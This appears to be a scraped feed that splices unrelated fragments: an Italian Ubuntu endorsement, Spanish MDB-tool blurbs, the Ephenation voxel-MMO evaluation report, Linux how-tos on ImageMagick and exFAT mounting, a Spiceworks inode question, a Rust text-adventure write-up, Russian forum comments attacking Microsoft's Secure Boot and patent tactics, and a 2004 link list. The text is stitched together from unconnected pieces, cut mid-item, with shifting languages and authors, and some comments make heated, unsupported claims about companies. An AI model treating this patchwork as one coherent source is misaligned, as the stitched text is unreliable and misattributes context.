Ancora un pro? la gestione pacchetti per l'installazione e l'aggiornamento del software: è anni luce dal sistema di Winzozz (che consiste nel: "fate un po' come cazzo vi pare"); su Ubuntu basta andare su
"Applicazioni -> Aggiungi/Rimuovi..."
e compare una bellissima libreria con una marea di software tra cui scegliere, navigabile per categoria, tipo etc. Quando hai letto le descrizioni ed ha selezionato quello che ti serve (e deselezionato quello che non ti serve ma che hai già nel pc) basta dargli un Ok, e lui fa tutto. E tu nel frattempo continui a lavorare sapendo che difficilmente servirà riavviare il sistema al termine dell'installazione.
Il vero pro, per me, è comunque politico: la possibilità di avere un mercato che offra prodotti di qualità, gratuiti e su cui puoi avere il pieno controllo; e penso soprattutto a cosa può (potrebbe) fare un paese del terzo mondo grazie al Free software...

In definitiva, sperando che venga definitivamente risolto il problema dei driver con le dannatissime schede Ati (colpa di Ati, ci tengo a precisarlo), e sperando che il mercato del software in Europa si liberalizzi (avete già firmato la petizione? ne parlai anch'io mesi fa), ormai il passaggio a Linux son riuscito a farlo, e spero che non sarò costretto ad arretrare.
L'obiettivo di rendermi indipendente da Winzozz prima di esser costretto a passare a Vista è ormai raggiunto, ora dovrò mettermi a far proselitismo :-)

Tag: , , , ,
          By: ranjeet kumar        
what a mistake y linux u tube videos r not downloading!







          Visor de archivos MDB en Linux        

Hace unos años escribí un post sobre cómo convertir un archivo MDB a ODB, pero desafortunadamente no funciona con la última versión de LibreOffice. Por suerte, existe un software para GNU/Linux llamado mdbtools, que contiene una serie de utilidades para consultar las bases de datos MDB (de Microsoft Access), así como exportación a CSV. La […]

El artículo Visor de archivos MDB en Linux pertenece al blog The Power of Mind.

          Conversor de Access a OpenOffice.org        

En alguna ocasión es posible que necesitéis recuperar información de un base de datos que creasteis hace años con MS Access, pero claro ahora usáis GNU/Linux y no tenéis ese engendro privativo. Que no panda el cúnico, buscando una solución, encontré que en la Junta de Extramadura han desarrollado un script para convertir nuestra base […]

El artículo Conversor de Access a OpenOffice.org pertenece al blog The Power of Mind.

          ASP.NET Hosting Comparison – ASPHostPortal vs Arvixe        
 With tons of companies in the ASP.NET hosting industry, it is very difficult to choose the best one. Both ASPHostPortal and Arvixe are well known names. ASPHostPortal famous due to its ASP.NET hosting services while Arvixe made its name mainly because they do various web hosting services, include Windows hosting and also Linux hosting. Both aims…
          Ephenation evaluation report        

Vision of Ephenation

To have a game like World Of Warcraft, where players are able to add their own adventures. I think this is a probable future development. This type of games should be fully realized and generally available in something like 10 to 20 years.


Unlimited world

The size of the world should not be limited. It is easier to implement a flat world than a spherical world, and a flat world can be unlimited. The nature will obviously have to be created automatically.

Unlimited players

This is not possible, of course, but the number of simultaneous players should be big. Limitation to 10 or 100 is much too small, as everyone would more or less know everyone and work on the same project. A minimum would be 1000 players, but preferably more than 10000. That will lead into a situation where you always meet new players you don't know, and the world is big enough so as to always find somewhere that you have not explored.

Unlimited levels

Most RPG type of games have a limited set of levels. But that will put a limit on the game play. After reaching the top level, the game is no longer the same. Not only that, but there is a kind of a race to reach this top level. Instead, there shall be no last top level. That will put an emphasis on constant exploration and progress.

Allocate territory

Players should be able to allocate a territory, where they can design their own adventures. This territory shall be protected from others, making sure no one else can interfere with the design.

Social support

The community and social interaction is very important. That is one reason for the requirement to support many players, as it will allow you to include all friends. There are a couple of ways to encourage community:
  1. Use of guilds. This would be a larger group of players, where you know the others.
  2. Temporary teams, used when exploring. It is more fun to explore with others.
  3. Use of common territories. It shall be possible to cooperate with friends to make territories that are related and possibly adjacent to each other.


It shall be possible to design interesting buildings, landscapes and adventures. The adventures shall be advanced enough so as to support triggered actions, with dynamic behavior that depends on player choices.


This is a description on how the project was executed. It was started end of 2010. Most of the programming was done by me (Lars Pensjö), but I got support with several sub modules.


It was decided to use Go as the programming language for the server. Go has just the right support for this type of software:
  1. High performance (compiled language)
  2. Object oriented and static typing
  3. A concept of gorutines (light version of threads)
  4. A very high quotient for "it works when it compiles"
  5. Garbage collection
The disadvantage of Go when the Ephenation project was started, was that Go was a new language, in transition, with uncertain future. This turned out to not be a problem, and the language has today a frozen specification (Go 1).

To be able to manage the massive amount of players, quadtrees are used for both players and monsters.

It is the server that has full control over all Model data. Player attributes, melee mechanisms, movements, etc.


The client was initially designed in C, but I soon switched to C++. There are still some remains from C, which explains some not-so-good OO solutions. OpenGL was selected, instead of DirectX, partly as a random choice, but also because I wanted to do the development in Linux.

It was decided to use OpenGL 3.3, instead of supporting older variants. There are some nice improvements in OpenGL that makes design easier, which was deemed more important than supporting old hardware.

The world consists of blocks, voxels. This is difficult to draw in real time with high FPS, as the number of faces grow very quickly with viewing distance. Considerable effort was spent on transforming the list of cubes into a list of visible triangles. It is also difficult to make a level of detail (LOD) algorithm that gradually reduce details on long distances.

Another technical difficult with a world based on cubes was to make it look nice, instead of blocky. Some algorithms were investigated that used a kind of filter. As the view distance is limited, there can be a conflict when being underground.

The game engine can't know whether the far distance, which is not visible, should be replaced by a light background (from the sky) or from a dark background (typical to being underground). A compromise is used, where the color of the distance fog depends on the player being at a certain height.


There are strict requirements on the protocol. If a server shall be able to handle 10000+ players, the communication can easily become a bottleneck. TCP/IP was selected in favor of UDP/IP, to make it easier to handle traffic control. The protocol itself is not based on any standard, and completely customized for Ephenation.


There are two major choices. Either use a scripting language to control the aspects of the world, or a graphical approach. A scripting language is more powerful, but on the other hand it is harder to learn. There is also the problem with supporting a massive amount of players, in which case time consuming scripts would make it unfeasible.

The choice was to go for a limited set of blocks, with a special block type that can be used to initiate predefined actions. Inspiration was taken from the principles of Lego blocks. With a relatively small set of basic blocks, it is possible to construct the most amazing things.


Game engine

The client side was designed from scratch, instead of using an existing game engine. This may have been a mistake, as the main development time was spent on graphical technology, instead of exploring the basic visions.

Adventure design and mechanics

The set of blocks and possible actions with "activator blocks" are currently limited. It is not enough to construct full adventures that are fun to explore and provides great entertainment.
Early version of the game, where a player abused the monster spawner

Game play

The basic world is automatically generated. This usually make a game of limited interest, as game play is bound to become repetitive. Support from initial players enabled the creation of a world with many new buildings and creations. The more advanced features that support dynamic behavior was not added until later, which unfortunately lead to most part of the current world being too static.


The graphics is working, but far from a production level. There are several glitches, e.g. camera falling inside the wall and lighting effects cut off. As the world is dynamic, the possibility to do offline precalculations are limited. That means most graphical effects has to be done live, which is a difficult requirement. For example, it is not known how many light sources that should be possible to manage. It was chosen to use a deferred shader, which improves the decoupling from geometry and shading.
Early attempt to create automatic monsters. This was later replaced with fully animated models.


The social side of the game play has been explored very limited. There are ways to send message to nearby players, and to communicate privately with any player. Although this is a very important aspect of the final vision, it is known technology and not difficult to implement.

Performance tests

The aggressive requirement to support 10,000 simultaneous players is hard to verify. A simple simulator was used, adding 1000 players at random position with a uniform density. These players simply walked around. If they were attacked, they attacked back again. If they were killed, they automatically used the command to revive again.

On a Core I7 with 8 GBytes of RAM, the load from the server was approximately 10%. This is no proof that the server can actually manage 10,000 players, as there may be non linear dependencies. There are known bottlenecks, for example monster management that is currently handled by a single thread. That means at most one core can be used for this, but it should be possible to distribute this task into several smaller goroutines.

The communication was measured at around 100 MB/s. With linear scaling, it would be 1GB/s for 10,000 players. The intention is that the scaling should be linear, as cross communication between players is designed to be of constant volume. Still, it remains to be proven.

There is the obvious question whether the simulator is representative to real players. One way to improve that assessment would be to measure the actual behaviour of real players, and compare with the simulator.

Another possible bottle neck is the communication with the player database (MongoDB). This depends on the number of login/logout and auto saves. It also depends on load generated from the web page. This has not been evaluated. Typically, an access takes about 1ms. The MongoDB is currently located on the same system as the game server, minimizing communication latency. The database will have to be managed by another computer system for a full production server.


The objects that the player can wear and wield are simplified. As the game as a concept is unlimited, it is not possible to hand craft objects. Instead, there are 4 defined qualities for each object, per level.


TCP/IP has a higher overhead than UDP/IP. Some packages are big (the complete chunks), which would have required several UDP/IP packets and a complicated transmission control. It may be that UDP/IP should be used instead. However, this was not an issue for evaluation of the project.

As the server is responsible for all object atributes, the clients need to be updated frequently. Player and monster positions are updated 10 times per second. This generates some data, so the update is limited to nearby players. Because of this, the client need to do interpolation to be able to show smooth movements, and the client need to be able to manage stale information about other players and monsters. The advantage of having the server manage all attributes is that it is not possible to cheat. The client source code is available, and it would have been easy to do changes.


Moore's law

I believe the computers will continue to grow more powerful exponentially for many years still. However, the full power will probably not be accessible unless the game server can scale well with increasing number of cores. The performance test were done on hardware from 2011, and there are already much more powerful equipment available.

Adventure design

As a proof of concept, I think the project was successful. The thing I miss most, is a powerful enough mechanism that supports custom adventures. This is a key point of the game concept, but I believe, with more personnel involved, that new ideas would be available that would improve the possibilities considerably.

Document update history

2013-02-22 First published.
2013-02-24 Added discussion about using voxels on the client side.
2013-02-27 Information about entity attribute management and communication.
2015-05-04 Pictures failed, and were replaced.

          Links from Open Source Musician Podcast 53        
Here are some links from Open Source Musician Podcast episode 53:

harrisonconsoles.com - Mixbus

Harrison Mixbus: The $79 Virtual Analog Console, Now on Both Mac and Linux

Sonic Talk Podcast


WalkThrough/Dev/JackSession - Jack Audio Connection Kit - Trac

ardour - the digital audio workstation

Ardour 3.0 alpha 4 released

Paul Davis

Mixxx - Free Digital DJ Software

DSSI - API for audio processing plugins

Leigh Dyer: woo, tangent | lsd's rants about games, music, linux, and technology


PiTiVi, a free and open source video editor for Linux

Open Source Musician Podcast: Podcast editing using Ardour

Saffire PRO 40 Audio Interface

ffado.org - Free Firewire Audio Drivers

Diffusion (acoustics) - Wikipedia


Podcast OUT.
          è½‰æª” Convert multi JPG PNG GIF image files into a single PDF file easily by ImageMagick on OSX Linux Cygwin        
I found a simple approach "ImageMagick" could
Apple convert JPG PNG PDF to PDF by ImageMagick on OSX
Besides, ImageMagick also works on other Unix systems, and even on cygwin.
此外,「ImageMagick」也能在其他的 Unix 或 Cygwin 內使用。
閱讀更多 »
          Linux change user as sudo root privileges and using command without password        
Everytime, if we would like use system command as sudoer, we should input password. But I found a way which using system command without password after google.
閱讀更多 »
          Install and Use exfat USB under Ubuntu        
Ubuntu exFAT

exFAT (Extended File Allocation Table) is a Microsoft file system optimized for flash drives. exFAT can be used where the NTFS file system is not a feasible solution (due to data structure overhead), or where the file size limit of the standard FAT32 file system is unacceptable.

exFAT has been adopted by the SD Card Association as the default file system for SDXC cards larger than 32 GB.

Native Linux support for exFAT is still limited. As of 2010, a working implementation under FUSE exists, which reached version 1.0 in 2013. So we need to install exfat-fuse and related packges in Ubuntu for using exFAT.

Install exfat package under Ubuntu

Update all repositories.
jose@jose-ubuntu:~$ sudo apt-get update

Installing the below 2 packages.
jose@jose-ubuntu:~$ sudo apt-get install exfat-fuse exfat-utils

Use exFAT USB under Ubuntu

If Ubuntu doesn't auto-mount your exFAT formatted driver, you could mount exfat USB manually after installed the above 2 packages.
jose@jose-ubuntu:~$ sudo mkdir /media/xxx
jose@jose-ubuntu:~$ sudo mount -t exfat /dev/sdxx /media/xxx

/media/xxx - means specific folder for exfat partition.
/dev/sdxx - means your exfat partition.
  1. How to enable exFAT in Ubuntu 14.04

          out of inodes        

Hi everyone,

This is my first post so a bit of background first - skip if you want


I've built a web-based coding dojo server which supports about 10 different languages.


It's free, no adverts, no login, instead it asks for donations to raise money to buy Raspberry Pi computers for schools. It's backed by Turnkey Rails. Turnkey is awesome. So far it's early days compared to what I'd like to do but I've more or cobbled stuff together and it seems to work and I'm starting to get some £ in and have already given a few Pi'es to local schools.


I'm pretty green at linux and admin etc. I've hit a problem that I'm running out of inodes. For example (after reclaiming some disk space on /dev/sda1 where I'm running out)

#df -i



Filesystem            Inodes   IUsed   IFree IUse% Mounted on
/dev/sda1             655360  555214  100146   85% /
none                  170404    2018  168386    2% /dev
none                  188955       1  188954    1% /dev/shm
none                  188955      32  188923    1% /var/run
none                  188955       3  188952    1% /var/lock
none                  188955       1  188954    1% /lib/init/rw
/dev/sda2            19546112      90 19546022    1% /mnt

So I was hoping I could "move" some of the space on /dev/sda2 to /dev/sda1

I've done a bit of searching and found this


which looks promising. However, ssh'ing onto my cyber-dojo server and running 



both report nothing. They don't say command not found. They just report nothing. Is this route an option for me? If so how do I do it?


It turns out that cyber-dojo gobbles disk inodes at a single particular sub-folder. I was wondering whether a simple ln to point that sub-folder to /mnt and so be on dev/sda2 might be a simpler solution? Would that work?


Also, when I go to


and I click the web-management and web-shell icons on the top right, they both say

This page is not available. How do I get them working? 





          Grml 2014.11 shipped on DVD of german Linux User magazine 02/2015        
          Grml 2014.03 shipped on DVD of german Linux User magazine 06/2014        
          Grml 2014.03 shipped on german magazine LinuxWelt 05/14        
          Grml 2014.03 shipped on DELUG-DVD of german Linux Magazine 06/2014        
          Thecus Launches Thecus Connect Live Information Tool        

Thecus launched a great new feature and app called Thecus Connect which is compatible with all Thecus’ Linux-base NAS devices. The new Thecus Connect is a remote WiFi connection app that allows users to gain love access to their NAS unit, enabling them to monitor the most up-to-date information and notifications directly on their mobile […]

The post Thecus Launches Thecus Connect Live Information Tool appeared first on eTeknix.

          Orbweb.me Now Also Supported on All Thecus Linux NAS’        

It has been a little over half a year since Thecus introduced the support for Orbweb.me on their WSS-based NAS’. That was so successful that the support now has been extended to all of Thecus’ Linux-based NAS’ too. Whether you run the older Thecus OS 5.0 or the recently released Thecus OS 7.0, you can […]

The post Orbweb.me Now Also Supported on All Thecus Linux NAS’ appeared first on eTeknix.

          Comment on 10 Best Linux Gaming Websites That Every Linux Gamer Should Follow by post-pc        
vidéo linux games 2017 : https://www.youtube.com/watch?v=-yMS3ybBLYo
          Comment on How TO Dual Boot Cub Linux On Windows 10, Chromixium OS by adil        
why linux distros wifi speeds are slow ? is cub inux any differrnt?
          Comment on How To Run Your Favorite Android Apps On Linux Operating System by Mochamad Fajar Sodik        
i'm not see this on my google chrome ? Why ?
          Comment on How To Run Your Favorite Android Apps On Linux Operating System by Mochamad Fajar Sodik        
"Now extract each and every Apk file that you have stored on your PC", what does mean ?, i don't know what should i do . Please help .
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by Raj Singh        
Thanx a lot :)
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by penultimateName        
I never meant to suggest you thought Windows is crap. Apologies if I gave that impression. There are many people that believe it is crap. I didn't get that impression from you. Well balanced criticism is welcome.
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by Raj Singh        
Everything has two aspects sir. One is good and one is bad. I didn't say windows is just a crap. I just mentioned some points which shows Linux is one step ahead than windows. By the way I completely agree with your point as well. :)
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by penultimateName        
Not so fast. I do agree there is a level of truth to all of the points. However there were vulnerabilities recently discovered that were open for a decade. Software is free but sometimes you get what you pay for. In any case many apps in the windows store is free. Very good chance Windows will continue to be free. For businesses maintenance is not free. There is no magic bullet. Linux has its place as well as Windows. Anyone that claims either one is the perfect solution is smoking the good stuff. I do have extensive experience with Linux at work.
          Linux / Amazon Web Services Systems Administrator        
NY-White Plains, Top Prospect Group is searching for a Linux / Amazon Web Services Systems Administrator for our national client based in Westchester County NY. This role is a direct hire role. As always, we are speaking directly to the hiring manager. Outstanding benefits and working environment. Gym in building! Call today Responsibilities: • Provide ongoing administration and support for Linux (CentOS) systems
          Linux hosts found as unknown or windows        

I found that the problem was the virtual machine I was using for the scan, I installed Spiceworks on my pc and the scan works well.

Thank you, Andrew, for your help.

          Linux hosts found as unknown or windows        

Already done, almost 3 times without success. The only solution is to make an entry for every "unknown" linux server.

          Linux hosts found as unknown or windows        

Try rescanning the device

          Linux hosts found as unknown or windows        

Thanks, I had already set the correct ssh login, but for some server it works, for some other no, I am very confused.

Now I have double checked and tested the root/password pair and I can't see why the problem is still there.

          Linux hosts found as unknown or windows        

i would take a guess at you not having the power of greyskull you have not added or enabled SSH on your scan range?

http://community.spiceworks.com/help/My_SSH_Account_Doesn%27t_Seem_To_Work_Right should help you get started

          Linux hosts found as unknown or windows        

Hi everyone, I have a big problem: I have tested Spiceworks for a few weeks, but I always got many linux server scanned as windows with wrong authentication.

My question is: is there a way to solve the situation without create an entry for every server?

Thanks in advance

This topic first appeared in the Spiceworks Community
          Cant open Books PDFs by clickung PDF or Path        
Calibre 2.85.1 Linux Opensuse 42.3 Usually I open a document by clicking the link in the right details panel "PDF" or "Path". This does not work and results in an error File or directory not found: Fehler beim Holen der Informationen für Datei »/home/zzz_servers/thot03/x_database/calibre/Marion%20Wendland/Kommunikation%20-%20Seminar%20(3586)«: Datei oder Verzeichnis nicht gefunden. However copying the underlying link to firefox or the file browser does the job... Have you forgotten the " ... " for the path? Anybody who experienced a similar behavior? I am grateful for tipps! Thanks
          RE[7]: Hate'em or love'em...        
My aren't you smug. It was stated that the Mini does not have an equivalent in the PC world, and it does the Shuttle X100. While not the same price, it has equivalent features, and the hardware is probably identical aside from the softROM that Apple uses instead of a hard BIOS. It having to run OS X wasn't part of the statement; it was form factor versus form factor. So it won't run OS X, big deal. To be accurate, it won't run Aqua; the core of OS X, Darwin, can be downloaded and ran on x86 hardware. I'd suggest to anyone that they just buy commodity hardware and run Linux, FreeBSD, Solaris, or Darwin on it if they want a Unix since it would serve them better in the long run rather then using OS X. The only thing that was attractive about Apple hardware was the PowerPC architecture. Now that is gone, I don't have a reason to look at Apples anymore. By the way, I'm posting this from my PowerBook G4 running OS X 10.4. There are some cool programs that run on OS X, so I'll probably keep it around for now. I'm less married to an OS then I am to either what it runs on or what I can do with it.
          A Rusty Venture: Writing a text adventure in Rust        

After a couple of months of playing around with Rust, I’ve finished a project! It’s a simple text adventure game in the vein of class text adventure Zork called Adventure!. The feature set isn’t as wide as Zork; there is no combat and movement & world interaction is pretty simple. I was never really into text adventures myself, but I though that it would make an interesting & fun first project with Rust.


I wanted to write a game containing of a few rooms, with a few things to do in each room. The feature set wouldn’t go past picking up objects, adding them to an inventory, and using inventory objects with static objects in the world. I didn’t want to involve combat on NPCs as I didn’t want to work on this project for the long-term; it’s a toy project for learning a bit about how Rust works.

Changing Rooms

My first design involved having Room structs that would contain a member connection: Connection. This Connection struct would itself have 4 members: north, south, east and west. The value of these members was to be an Option<Box<Room>>. The main Game object that ran the whole show would have a current_room reference that points to whatever instance of Room the user was in.

Unfortunately, this design gave me trouble with the borrow checker. I got many cannot moved out of borrowed context errors thrown at me. At the time, I didn’t really fully understand how the borrow checker works - and honestly, I’m pretty sure I still don’t understand fully. I decided to take a simpler approach: I’d store current_room as an integer representing an index in the vector of rooms. In Rust, the index of a vector is the type usize, a pointer-sized (therefore system-dependent) unsigned int. At first, I stored current_room as an i32 but this led to lots of as usize casting all over the place. Connection objects would be Option<usize> and changing rooms would be as simple as replacing current_room with another usize value.

The downside of this approach is having to know each Room’s index in the vector ahead of time. I kept track of the room number while designing the game ‘map’ so it wasn’t a big deal in my particular situation. I thought being able to ‘point’ to other Room directly with a reference would be simpler, but that would bring its own problems with it. For example, this would bring about circular references (eg: Room 1 is connected to Room B, but if we create Room 1 first, how do we define this relationship when creating the Room object? My solution: You wouldn’t, you’d connect the rooms afterwards).

Flags & Actions

My next set of problems came with dealing with state change in the game. I ended up declaring a HashMap<&'static str, bool> in a struct Flags at the top-level of the game that gets passed around to the different functions. Originally, each Room was going to have its own set of flags but I didn’t want have to reach across rooms to check the state of something - especially if an action in one room can have consequenes elsewhere.

Dealing with the actions took the longest to figure out. I had an important questions I needed to answer at this point: How can I define each Item or Room to have different behaviour depending on the state of global flags? To solve this, I used closures. For instance, here is how an Item is defined:

struct Item {
    name: String,
    is_grabbable: bool,
    on_grab: Box<Fn(&mut Flags)>,
    on_use: Box<Fn(&mut Flags, String, usize) -> bool>,

Both on_grab and on_use accept closures. Because our state is stored in a global object, each room doesn’t really need to worry about what’s going on in other rooms - they only need to know the state of the world through the Flag objects they receive. This allows me to use closures to define certain behaviour.

I’m not exactly sure if this method is idiomatic Rust. I’ve been writing primarily JavaScript for my day job for the past few years so I’m still in that state of mind where functions are first class citizens that I should be taking advtange of. I wasn’t really sure how else to define individual behaviour for separate instances of the same type.1

For instance, this is an example of how an Item is defined:

Item {
    name: "shovel".to_string(),
    is_grabbable: true,
    on_grab: Box::new(|flags: &mut Flags| {
        println!("The shovel looks as if it has never been used before; the layer of dust that falls off as you pick it up shows that it has been sitting on that table for a long time. You slip the shovel in your pocket.");
        flags.update_key("pickedUpShovel", true);
    on_use: Box::new(|flags: &mut Flags, object_name: String, current_room: usize| -> bool {
        // this sucks; checking if we are in the room before perfoming action
        if current_room == 1 && object_name == "glass door" {
            if flags.get_key("smashedDoor") == Some(&false) {
                println!("It takes a few swings before a couple of cracks appear in the glass. Wondering why such strong glass is needed for a greenhouse door, you continue to swing away until a loud crash and gust of fresh air announces the success of your swinging endeavours.");
                flags.update_key("smashedDoor", true);
            else {
                println!("You seem to have already done a number on that poor door - maybe you should leave it alone?");
        else {
            println!("You aren't sure how to use the shovel with the {}", object_name);

… and that’s just one item! Imagine a whole Room, with it’s own behaviour and items! (Or see for yourself and check out the source file with the levels defined).

Another issue is that this method leads to cases where certain objects that don’t use a specific callback have empty closures, which makes rustc complain about unused variables. This isn’t a huge deal, but it can clutter up compiler messages which is slightly annoying.

Originally, I planned on serializing each room into data files instead of hard coding them into Rust source code. This way, anyone can write their own text adventure without knowing a line of Rust! As soon as I decided to use closures, however, that task seemed like it would be much more difficult. How do you serialize behaviour? The only method I can think of is via a scripting language, and that was way out of scope for this project.

Other random notes

  • It would be nice if there was a way to initialize a HashMap by passing a series of key/values to its new() function or via a literal. I’m using a macro I found on StackOverflow to do the job right now but it would be neat if this was built into the standard library.

Conclusion: I like it.

In the process of writing this post, I’ve had to question a few of my design choices and actually learned new stuff (the idea of changing the type of current_room from i32 to usize happened due to this post)!

The likelihood of me continuing to work on this project is low. Howevever, if I were to make an ‘Adventure! 2.0’, I’d make the following changes:

  • Spice things up with Termion. I came across this great blog post by the author of the termion crate, ticki. Maybe making some item names show up in Zelda’s “Important Noun” red, or having more of a persistant GUI on screen such as the inventory.
  • Take advantage of more core Rust/Cargo tools, like rustdoc.
  • Tests! Testing is important. I worked on this project for a few hours a week over the span of a month so it wasn’t something at the top of my mind.
  • Figure out cross-compilation so I can build executables for Windows & MacOS from my Linux desktop

I had fun working on Adventure. If you’d like to check it out, here is the GitHub repo. I’d like to figure out cross-compilation soon to get some binaries up on on the GitHub page. My next project will involve gasp graphics! Until then…

  1. As I write this, a few ideas come to mind (although I’m not sure if they actually work). Perhaps creating a trait that all Rooms/Items implement, and write a macro that creates a new struct with said trait with the individual behaviour defined within? Just a thought. 

          24.03.2013 19:44:24 ximaera        
Не знаю, с какой целью MS хотела сдуть SCO, но патентные претензии к Linux у неё есть и собственные. en.wikipedia.org/wiki/Software_patents_and_free_software#Infringement_claims
          24.03.2013 14:09:51 Deeman        
SB — это ловушка для возможных антимонопольных проверок. Формально правила Microsoft позволяют отключить SecureBoot и поставить Linux или любую другую ОС без проверок на ключ, который унизительным путём надо получать у самой Microsoft.

На самом деле, они реализовали эту схему крайне хитрым образом, просчитав поведение покупателей:
1) Microsoft — монополист на рынке PC. Они диктуют, какие технологии встраивать в материнские платы, потому что 96% покупателей будут устанавливать именно их операционную систему и каждый производитель, если хочет остаться на плаву, обязан подчиниться.
2) Большинство их покупателей технически безграмотны в той степени, чтобы зайти в настройки UEFI и отключить SecureBoot.
3) Таким образом, эти люди не смогут попробовать бесплатную альтернативу в виде дружелюбных дистрибутивов вроде Ubuntu и навсегда останутся в рабстве у Microsoft.

Если вам кажется, что я утрирую, сами посмотрите — раньше такое было? Хоть один случай? Я знаю историю с ACPI, который был спроектирован таким образом, чтобы работать с Windows и поставить средние по тяжести палки в колёса Linux. В итоге поддержку удалось реализовать, несмотря на сильный недостаток документации.

Но тут — другая история: уже на самом низком системном уровне Microsoft узурпировала право указывать, чему позволять загружаться, а чему — нет. Мысль о том, что HP и Intel действовали отдельно, разрабатывая UEFI, кажется глупой — ведь именно ПО Microsoft на этом железе они собирались запускать!

Поэтому: не вижу никаких оправдательных мотивов для этого поступка; на мой взгляд, как компания MS гнилые до основания, ими движет только прибыль, и не надо говорить про то, что это основная цель у корпораций, здесь совершенно реально запрещают использование альтернативных продуктов, и это нифига не нормально; и вот мысль по поводу будущего:

Мир движется в сторону мобильных устройств. Планшеты на Android — единственные, которые имеют в своих рядах модели с открытым загрузчиком, а девайсы от BlackBerry, Apple, и все сертифицированные для Windows 8 не позволяют запускать ни одну ОС из внешнего мира — это залочка десятилетия и, на мой взгляд, технологическая цензура. Мобильную Ubuntu можно будет поставить только на планшеты Android, остальные даже не дадут попробовать её запустить. Эта зловещая тенденция просто обязана быть остановлена, иначе мы попадем в новый феодальный век, где крупные корпорации будут стричь деньги с покупателей, просто не давая им право выбора.

Умных пользователей сейчас все меньше, потому что медиакомпании взяли какой-то совсем жесткий курс на отупление — как пример, пользователи Apple, у которых «всё работает» и они «скорее заплатят денежку, чем будут разбираться». Идеальные потребители. А где новых создателей взять?
          24.03.2013 13:50:54 Nothingman        
У вас комплексы, судя по всему. А ничего что Google первый заявил, что не будет поддерживать свой софт для Windows Phone, более того заставил большую часть уйти с gmail, тему можете найти тут, далее прикрыл доступ к картам для Windows Phone. Это все было мотивировано малым количеством пользователей WP, но Microsoft ведь поддерживает Skype для Linux, хотя в процентном соотношении разница будет аналогична или даже больше чем Android над WP.
          24.03.2013 12:50:28 Deeman        
Ссылка, которую вы оставили — пиар чистой воды. Кричащий.
Нокия выложила файлы для изготовления собственных корпусов на 3D-принтере. А теперь думаем: 3D-принтеры есть у мизерного количества покупателей их телефонов, наладить производство собственных телефонов на основе этих файлов не получится, так как в Нокии сразу возопят про «патенты!!» «нарушение прав на дизайн линейки Lumia!!11»

Короче, это шаг, который направлен на создание светлого образа компании в глазах технарей, который на самом деле пуст и о настоящем направлении компании не говорит. Вообще.

Кстати, Майкрософт тоже в последнее время пиарятся на почве opensource, и даже на хабре я встречаю комменты, где всерьез полагают, что MS стала империей добра. Ребята, что с вами? Если копнуть, то сразу видим, что все опенсорс-проекты MS так или иначе направлены на поддержку или рекламу её собственных продуктов — даже Mono был разработан без участия MS (если разработку .NET таковой не считать). Зато реально они занялись созданием SecureBoot, михалковским рейдом на всех андроидных производителей с требованием диких отчислений (напомню, сейчас только Sony не платит отчисления за андроид, а многие производители платят больше, чем за лицензцию на WindowsPhone), они купили Скайп, чтобы использовать его как элемент шантажа или перетаскивания покупателей на свою платформу (а-ля гугл с покупкой ютуба и перетаскиванием всех в G+ сейчас) — это все очень похоже на поведение собаки на сене. Стали выпускать хреновые продукты, получать бабло за патенты, которые нарушает ядро Linux, содержание которые никому не разгласили (!), и решили никакой многообещающей технологии не давать развиваться, минуя технологии MS.

Microsoft — жадная, зачастую нечестная корпорация и была такой с самого начала.
          24.03.2013 12:04:21 Zigmar        
Когда Нокия троллит Айфон, а Майкрософт и Эппл троллит производителей андроид аппаратов — это все сильно попахивает, но их в какой-то степени можно понять — это области в которых они напрямую конкурируют, и пытаются если не выдавить конкурентов с рынка (как в случаее с Эппл), то хотя бы откусить кусок чужого профита (Майкрософт, Нокия). Этот же иск — это уже за гранью добра и зла, что то из серии SCO vs Linux или тактик профессиональных патентных троллей вроде Intellectual Ventures. Просто «поднасрать» и срубить бабла, не капельки не заботясь о том, что бы хоть как то сохранить лицо. Сегодня мое мнение о Нокии упало ниже плинтуса.
          [urls] Web Services Differentiation with Service Level Agreements        
Wednesday, September 1, 2004
Dateline: China
The following is a sampling of my top ten "urls" for the past couple/few weeks.  By signing up with Furl (it's free), anyone can subscribe to an e-mail feed of ALL my urls (about 100-250 per week) -- AND limit by subject (e.g., ITO) and/or rating (e.g., articles rated "Very Good" or "Excellent").  It's also possible to receive new urls as an RSS feed.  However, if you'd like to receive a daily feed of my urls but do NOT want to sign up with Furl, I can manually add your name to my daily Furl distribution list.  (And if you want off, I'll promptly remove your e-mail address.)
Top Honors:
* Web Services Differentiation with Service Level Agreements, courtesy of IBM T.J. Watson; as the title suggests, this paper tackles SLAs.  See also Web Services QoS: External SLAs and Internal Policies, by the same author.  The latter paper was the invited keynote at the 1st Web Services Quality Workshop (this site provides links to abstracts for all the workshop papers as well as links to each author's personal site).
Other best new selections (in no particular order):
* Product Focused Software Process Improvement: PROFES 2004 (if you're going to read only one tech book this year, let it be this!!)
* Legacy systems strike back!!  We all know that there is a good market in servicing legacy systems.  See the following: Arriba: Architectural Resources for the Restructuring and Integration of Business Application (an introduction), Identifying Problems in Legacy Software, and Evolution of Legacy Systems.  
* Online Communities in Business: Past Progress, Future Directions, Five Keys To Building Business Relationships Online and Advantages of Using Social Software for Building Your Network.  (I can say with a fairly high level of confidence that these tools can be used to expand your business network.  Been there, done that.  Give it a try.  Do I already know you and would you like an invitation to join LinkedIn?  If the answer to both questions is "yes," let me know ...)
* Carnegie Mellon Project Aura Video (gets a bit silly at times, but the language translation component was interesting to see; the R-T example is still years away, but the idea is intriguing and this is where collaboration tools need to go)
* Innovation: Strategy for Small Fish (from the Harvard Business School; however, NVIDIA would not have been my choice for a case study)
* Stata Labs: Managing at a Distance, for Less (a pretty good case study; I firmly believe that China's systems integrators/contract developers need world-class collaboration tools and this describes one of the formats I support)
* An Authoring Technology for Multidevice Web Applications (one of my favorite topics -- and an area where I believe SIs in China can take the lead)
* Cheapware (or, "Changsha Gone Wild!!"; hey Qilu clan, are you listening?  Go, Ding, go!!)
* How To Team With A Vendor (a "must read" -- and evidently a lot of my readers already did, even though I only made a passing reference in a previous posting)
Examples of urls that didn't make my "Top Ten List":
> ITU Internet Reports 2004: The Portable Internet (looks like this might be a great series; less biased than the typical IT advisory services report -- and a much better value, too)
> Software Cost Reduction (courtesy of the <U.S.> Naval Research Lab, this paper is a bit dated, but still worth reading; addresses problems with large-scale systems, albeit a bit light on practical examples) 
